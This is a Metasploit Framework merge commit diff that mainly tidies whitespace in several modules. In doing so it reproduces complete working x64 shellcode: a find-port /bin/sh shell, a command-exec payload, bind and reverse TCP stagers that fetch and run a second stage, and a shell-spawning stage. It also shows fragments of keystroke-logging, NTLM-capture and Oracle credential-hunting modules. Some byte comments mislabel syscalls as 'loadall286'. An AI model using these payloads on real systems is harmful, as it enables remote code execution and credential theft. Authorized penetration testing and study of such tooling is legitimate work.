Merge branch 'msftidy_police' of https://github.com/wchen-r7/metasploit-framework into wchen-r7-msftidy_police
commit
291ad27a69
|
@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("[#{cid}] Keys: #{nice}")
|
||||
|
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request '#{request.uri}'...")
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -93,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Handles the initial requests waiting for the browser to try NTLM auth
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_args()
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -38,50 +38,50 @@ module Metasploit3
|
|||
'CPORT' => [ 32, 'n' ],
|
||||
},
|
||||
|
||||
'Assembly' => <<EOS
|
||||
xor rdi,rdi
|
||||
xor rbx,rbx
|
||||
mov bl,0x14
|
||||
sub rsp,rbx
|
||||
lea rdx,[rsp]
|
||||
lea rsi,[rsp+4]
|
||||
find_port:
|
||||
push 0x34 ; getpeername
|
||||
pop rax
|
||||
syscall
|
||||
inc rdi
|
||||
cmp word [rsi+2],0x4142
|
||||
jne find_port
|
||||
dec rdi
|
||||
push 2
|
||||
pop rsi
|
||||
dup2:
|
||||
push 0x21 ; dup2
|
||||
pop rax
|
||||
syscall
|
||||
dec rsi
|
||||
jns dup2
|
||||
mov rbx,rsi
|
||||
mov ebx, 0x68732f41
|
||||
mov eax,0x6e69622f
|
||||
shr rbx,8
|
||||
shl rbx,32
|
||||
or rax,rbx
|
||||
push rax
|
||||
mov rdi,rsp
|
||||
xor rsi,rsi
|
||||
mov rdx,rsi
|
||||
push 0x3b ; execve
|
||||
pop rax
|
||||
syscall
|
||||
EOS
|
||||
'Assembly' => %Q|
|
||||
xor rdi,rdi
|
||||
xor rbx,rbx
|
||||
mov bl,0x14
|
||||
sub rsp,rbx
|
||||
lea rdx,[rsp]
|
||||
lea rsi,[rsp+4]
|
||||
find_port:
|
||||
push 0x34 ; getpeername
|
||||
pop rax
|
||||
syscall
|
||||
inc rdi
|
||||
cmp word [rsi+2],0x4142
|
||||
jne find_port
|
||||
dec rdi
|
||||
push 2
|
||||
pop rsi
|
||||
dup2:
|
||||
push 0x21 ; dup2
|
||||
pop rax
|
||||
syscall
|
||||
dec rsi
|
||||
jns dup2
|
||||
mov rbx,rsi
|
||||
mov ebx, 0x68732f41
|
||||
mov eax,0x6e69622f
|
||||
shr rbx,8
|
||||
shl rbx,32
|
||||
or rax,rbx
|
||||
push rax
|
||||
mov rdi,rsp
|
||||
xor rsi,rsi
|
||||
mov rdx,rsi
|
||||
push 0x3b ; execve
|
||||
pop rax
|
||||
syscall
|
||||
|
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def size
|
||||
return 91
|
||||
end
|
||||
def size
|
||||
return 91
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
|
|
@ -38,10 +38,10 @@ module Metasploit3
|
|||
payload =
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
"/usr/bin/say\x00" +
|
||||
call +
|
||||
"/usr/bin/say\x00" +
|
||||
say +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x4C\x8D\x57\x0D" + # lea r10,[rdi+0xd]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
|
|
|
@ -44,41 +44,41 @@ module Metasploit3
|
|||
cmd = (datastore['CMD'] || '') << "\x00"
|
||||
call = "\xe8" + [cmd.length].pack('V')
|
||||
|
||||
payload =
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x04" + # push byte +0x4
|
||||
"\x5A" + # pop rdx
|
||||
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\x48\xFF\xC7" + # inc rdi
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
|
||||
datastore['TAG'] +
|
||||
"\x75\xED" + # jnz 0x17
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
cmd +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x0F\x05" # loadall286
|
||||
payload =
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x04" + # push byte +0x4
|
||||
"\x5A" + # pop rdx
|
||||
"\x48\x8D\x4A\xFE" + # lea rcx,[rdx-0x2]
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\x48\xFF\xC7" + # inc rdi
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x81\x3C\x24" + # cmp dword [rsp],0x4e454d4f
|
||||
datastore['TAG'] +
|
||||
"\x75\xED" + # jnz 0x17
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x5A\x00\x00\x02" + # mov eax,0x200005a
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x31\xC0" + # xor rax,rax
|
||||
"\xB8\x3B\x00\x00\x02" + # mov eax,0x200003b
|
||||
call +
|
||||
cmd +
|
||||
"\x48\x8B\x3C\x24" + # mov rdi,[rsp]
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x52" + # push rdx
|
||||
"\x57" + # push rdi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x0F\x05" # loadall286
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
@ -27,67 +27,67 @@ module Metasploit3
|
|||
{
|
||||
'Offsets' => { 'LPORT' => [ 31, 'n'] },
|
||||
'Payload' =>
|
||||
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
|
||||
"\x6A\x02" + # push byte +0x2
|
||||
"\x5F" + # pop rdi
|
||||
"\x6A\x01" + # push byte +0x1
|
||||
"\x5E" + # pop rsi
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x56" + # push rsi
|
||||
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
|
||||
"\x56" + # push rsi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x10" + # push byte +0x10
|
||||
"\x5A" + # pop rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x49\x89\xFC" + # mov r12,rdi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
|
||||
"\x4C\x89\xE7" + # mov rdi,r12
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x48\x89\xE2" + # mov rdx,rsp
|
||||
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x49\x89\xC5" + # mov r13,rax
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x51" + # push rcx
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x41\x5B" + # pop r11
|
||||
"\x4C\x89\xDE" + # mov rsi,r11
|
||||
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
|
||||
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
|
||||
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
|
||||
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
|
||||
"\x49\x89\xF8" + # mov r8,rdi
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC6" + # mov rsi,rax
|
||||
"\x56" + # push rsi
|
||||
"\x4C\x89\xEF" + # mov rdi,r13
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x4C\x89\xDA" + # mov rdx,r11
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x58" + # pop rax
|
||||
"\xFF\xD0" # call rax
|
||||
"\xB8\x61\x00\x00\x02" + # mov eax,0x2000061
|
||||
"\x6A\x02" + # push byte +0x2
|
||||
"\x5F" + # pop rdi
|
||||
"\x6A\x01" + # push byte +0x1
|
||||
"\x5E" + # pop rsi
|
||||
"\x48\x31\xD2" + # xor rdx,rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x68\x00\x00\x02" + # mov eax,0x2000068
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x56" + # push rsi
|
||||
"\xBE\x00\x02\x15\xB3" + # mov esi,0xb3150200
|
||||
"\x56" + # push rsi
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x6A\x10" + # push byte +0x10
|
||||
"\x5A" + # pop rdx
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x6A\x00\x00\x02" + # mov eax,0x200006a
|
||||
"\x48\x31\xF6" + # xor rsi,rsi
|
||||
"\x48\xFF\xC6" + # inc rsi
|
||||
"\x49\x89\xFC" + # mov r12,rdi
|
||||
"\x0F\x05" + # loadall286
|
||||
"\xB8\x1E\x00\x00\x02" + # mov eax,0x200001e
|
||||
"\x4C\x89\xE7" + # mov rdi,r12
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\x48\x89\xE2" + # mov rdx,rsp
|
||||
"\x48\x83\xEA\x04" + # sub rdx,byte +0x4
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x49\x89\xC5" + # mov r13,rax
|
||||
"\x48\x89\xC7" + # mov rdi,rax
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x51" + # push rcx
|
||||
"\x48\x89\xE6" + # mov rsi,rsp
|
||||
"\xBA\x04\x00\x00\x00" + # mov edx,0x4
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x41\x5B" + # pop r11
|
||||
"\x4C\x89\xDE" + # mov rsi,r11
|
||||
"\x81\xE6\x00\xF0\xFF\xFF" + # and esi,0xfffff000
|
||||
"\x81\xC6\x00\x10\x00\x00" + # add esi,0x1000
|
||||
"\xB8\xC5\x00\x00\x02" + # mov eax,0x20000c5
|
||||
"\x48\x31\xFF" + # xor rdi,rdi
|
||||
"\x48\xFF\xCF" + # dec rdi
|
||||
"\xBA\x07\x00\x00\x00" + # mov edx,0x7
|
||||
"\x41\xBA\x02\x10\x00\x00" + # mov r10d,0x1002
|
||||
"\x49\x89\xF8" + # mov r8,rdi
|
||||
"\x4D\x31\xC9" + # xor r9,r9
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x48\x89\xC6" + # mov rsi,rax
|
||||
"\x56" + # push rsi
|
||||
"\x4C\x89\xEF" + # mov rdi,r13
|
||||
"\x48\x31\xC9" + # xor rcx,rcx
|
||||
"\x4C\x89\xDA" + # mov rdx,r11
|
||||
"\x4D\x31\xC0" + # xor r8,r8
|
||||
"\x4D\x31\xD2" + # xor r10,r10
|
||||
"\xB8\x1D\x00\x00\x02" + # mov eax,0x200001d
|
||||
"\x0F\x05" + # loadall286
|
||||
"\x58" + # pop rax
|
||||
"\xFF\xD0" # call rax
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -31,19 +31,19 @@ module Metasploit3
|
|||
'LPORT' => [ 35, 'n']
|
||||
},
|
||||
'Payload' =>
|
||||
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
|
||||
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
|
||||
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
|
||||
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
|
||||
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
|
||||
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
|
||||
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
|
||||
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
|
||||
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
|
||||
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
|
||||
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
|
||||
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
|
||||
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
|
||||
"\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48" +
|
||||
"\x31\xd2\x0f\x05\x49\x89\xc5\x48\x89\xc7\xb8\x62" +
|
||||
"\x00\x00\x02\x48\x31\xf6\x56\x48\xbe\x00\x02\x15" +
|
||||
"\xb3\x7f\x00\x00\x01\x56\x48\x89\xe6\x6a\x10\x5a" +
|
||||
"\x0f\x05\x4c\x89\xef\xb8\x1d\x00\x00\x02\x48\x31" +
|
||||
"\xc9\x51\x48\x89\xe6\xba\x04\x00\x00\x00\x4d\x31" +
|
||||
"\xc0\x4d\x31\xd2\x0f\x05\x41\x5b\x4c\x89\xde\x81" +
|
||||
"\xe6\x00\xf0\xff\xff\x81\xc6\x00\x10\x00\x00\xb8" +
|
||||
"\xc5\x00\x00\x02\x48\x31\xff\x48\xff\xcf\xba\x07" +
|
||||
"\x00\x00\x00\x41\xba\x02\x10\x00\x00\x49\x89\xf8" +
|
||||
"\x4d\x31\xc9\x0f\x05\x48\x89\xc6\x56\x4c\x89\xef" +
|
||||
"\x48\x31\xc9\x4c\x89\xda\x4d\x31\xc0\x4d\x31\xd2" +
|
||||
"\xb8\x1d\x00\x00\x02\x0f\x05\x58\xff\xd0"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -26,11 +26,11 @@ module Metasploit3
|
|||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
|
||||
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
|
||||
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
|
||||
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
|
||||
"\x52\x57\x48\x89\xe6\x0f\x05"
|
||||
"\xb8\x5a\x00\x00\x02\x48\x31\xf6\x0f\x05\xb8\x5a"+
|
||||
"\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31\xc0\xb8"+
|
||||
"\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69"+
|
||||
"\x6e\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2"+
|
||||
"\x52\x57\x48\x89\xe6\x0f\x05"
|
||||
}
|
||||
))
|
||||
end
|
||||
|
|
|
@ -181,18 +181,18 @@ class Metasploit3 < Msf::Post
|
|||
found_key = false
|
||||
basekey_set = ["HKLM\\SOFTWARE\\Oracle\\SYSMAN","HKLM\\SOFTWARE\\ORACLE\\KEY_XE"]
|
||||
basekey_set.each do |basekey|
|
||||
next if found_key
|
||||
next if found_key
|
||||
instances = registry_enumkeys(basekey)
|
||||
if instances.nil? or instances.empty?
|
||||
next
|
||||
else
|
||||
found_key = true
|
||||
end
|
||||
|
||||
|
||||
instances.each do |i|
|
||||
if basekey.include?"KEY_XE"
|
||||
val_ORACLE_SID = registry_getvaldata(basekey,"ORACLE_SID")
|
||||
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
|
||||
val_ORACLE_HOME = registry_getvaldata(basekey,"ORACLE_HOME")
|
||||
else
|
||||
key = "#{basekey}\\#{i}"
|
||||
val_ORACLE_SID = registry_getvaldata(key,"ORACLE_SID")
|
||||
|
|
Loading…
Reference in New Issue